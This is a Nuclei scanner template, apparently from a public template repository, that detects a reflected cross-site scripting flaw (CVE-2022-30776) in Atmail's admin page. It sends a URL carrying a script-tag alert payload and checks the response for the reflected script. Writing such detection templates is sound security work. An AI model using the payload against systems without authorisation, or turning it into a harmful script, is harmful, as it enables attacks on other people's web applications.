nuclei-templates/cves/2022/CVE-2022-30776.yaml

26 lines
492 B
YAML
Raw Normal View History

id: CVE-2022-30776
2022-05-17 11:45:20 +00:00
info:
name: Atmail Xss
author: 3th1c_yuk1
severity: medium
reference:
- https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9
2022-05-17 11:45:20 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/atmail/index.php/admin/index/?error=1<ScRiPt>alert('XSS')</ScRiPt>"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert('XSS')</script>"
- type: word
part: header
words:
- "text/html"